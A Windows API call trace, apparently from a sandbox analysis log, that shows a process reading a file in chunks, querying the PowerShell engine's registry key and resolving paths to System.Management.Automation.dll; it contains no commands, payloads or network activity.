	[0629.953] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.954] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.954] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.954] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.955] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.955] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.956] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.956] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.957] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.957] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.965] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.965] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.965] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.966] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.967] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.967] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.967] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.968] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.969] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.970] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.971] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.972] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.973] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.974] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.974] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0xf37, lpOverlapped=0x0) returned 1
	[0629.974] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5f3cf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5f3cf*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0629.974] ReadFile (in: hFile=0x2e4, lpBuffer=0x2e5fd30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2e5fd30*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0629.975] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0629.975] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0629.975] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0629.975] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0629.975] CoTaskMemFree (pv=0x26f2b0) 
	[0629.975] RegCloseKey (hKey=0x2e4) returned 0x0
	[0629.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0629.990] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6f62231f, Data2=0xf173, Data3=0x4f59, Data4=([0]=0x86, [1]=0xb7, [2]=0x77, [3]=0x8f, [4]=0x75, [5]=0x9b, [6]=0xa8, [7]=0x2d))) returned 0x0
	[0629.991] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa234211d, Data2=0x8660, Data3=0x4cee, Data4=([0]=0xb2, [1]=0xc7, [2]=0x77, [3]=0xaa, [4]=0xf7, [5]=0x84, [6]=0xd2, [7]=0x4))) returned 0x0
	[0632.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.651] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa65ae485, Data2=0xfd46, Data3=0x4cf2, Data4=([0]=0xa3, [1]=0xd5, [2]=0x39, [3]=0x7a, [4]=0x8a, [5]=0x4b, [6]=0x89, [7]=0x4e))) returned 0x0
	[0632.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.655] VirtualQuery (in: lpAddress=0x16b1c0, lpBuffer=0x16c080, dwLength=0x30 | out: lpBuffer=0x16c080*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0632.657] VirtualQuery (in: lpAddress=0x16b250, lpBuffer=0x16c110, dwLength=0x30 | out: lpBuffer=0x16c110*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0632.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.658] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0632.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
